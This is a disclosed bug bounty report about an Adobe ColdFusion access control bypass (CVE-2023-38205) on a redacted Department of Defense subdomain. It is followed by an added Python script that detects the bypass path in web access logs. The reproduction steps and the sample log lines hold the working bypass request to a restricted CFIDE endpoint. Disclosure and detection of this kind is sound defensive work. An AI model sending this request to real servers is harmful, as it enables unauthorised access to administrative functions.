Adobe ColdFusion Access Control Bypass - CVE-2023-38205

Disclosed: 2023-12-21 17:32:48 By 0r10nh4ck To deptofdefense
High
Vulnerability Details
**Description:** Hi team,

The subdomain https://████ is running Adobe ColdFusion vulnerable to CVE-2023-38205. This vulnerability is a bypass path created for CVE-2023-29298.

## References

https://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/

## Impact

If an attacker accesses a URL path of /hax/..CFIDE/wizards/common/utils.cfc, the access control can be bypassed and the expected endpoint can still be reached, even though it is not a valid URL path.

## System Host(s)

█████████

## Affected Product(s) and Version(s)

## CVE Numbers

CVE-2023-38205

## Steps to Reproduce

1. Go to: https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx
2. See the remote method call wizardHash on the /CFIDE/wizards/common/utils.cfc endpoint.

## Suggested Mitigation/Remediation Actions
Report Stats
  • Report ID: 2090435
  • State: Closed
  • Substate: resolved
  • Upvotes: 8
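
As an added example (not part of the original report and not vendor code), a defender can search web-server access logs for the path shape the report describes: a path segment in which `..` is joined directly to `CFIDE`. The log lines, client addresses and function names below are constructed for illustration, and the common/combined log format is an assumption.

```python
import re
from urllib.parse import unquote

# Assumed common/combined log format: client first, request line in quotes.
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

def suspicious_segment(target):
    """Return the path segment that glues '..' to CFIDE, or None."""
    path = target.split("?", 1)[0]          # drop the query string
    for _ in range(2):                      # undo single and double percent-encoding
        path = unquote(path)
    for segment in path.replace("\\", "/").split("/"):
        # A real traversal segment is exactly ".."; "..CFIDE" is not one,
        # which is the path shape described in the report.
        if segment.lower().startswith("..cfide"):
            return segment
    return None

def scan(lines):
    """Return (line number, client, segment) for every matching request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LINE_RE.match(line)
        if not match:
            continue
        segment = suspicious_segment(match["target"])
        if segment:
            hits.append((number, match["client"], segment))
    return hits

# Constructed sample log (documentation address range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2023:10:00:01 +0000] "GET /index.cfm HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Aug/2023:10:00:07 +0000] "GET /hax/..CFIDE/wizards/common/'
    'utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx'
    ' HTTP/1.1" 200 301',
    '192.0.2.10 - - [01/Aug/2023:10:00:09 +0000] "GET /CFIDE/scripts/cfform.js HTTP/1.1" 200 2048',
    # Percent-encoded spelling of the same segment, to exercise the decoding step.
    '192.0.2.44 - - [01/Aug/2023:10:00:12 +0000] "GET /a/%2e%2eCFIDE/wizards/common/utils.cfc HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for number, client, segment in scan(SAMPLE_LOG):
        print(f"line {number}: {client} requested a path containing {segment!r}")
```

Ordinary requests under `/CFIDE/` and genuine `..` traversal segments are not flagged, so the check isolates the malformed segment rather than all ColdFusion administrative traffic.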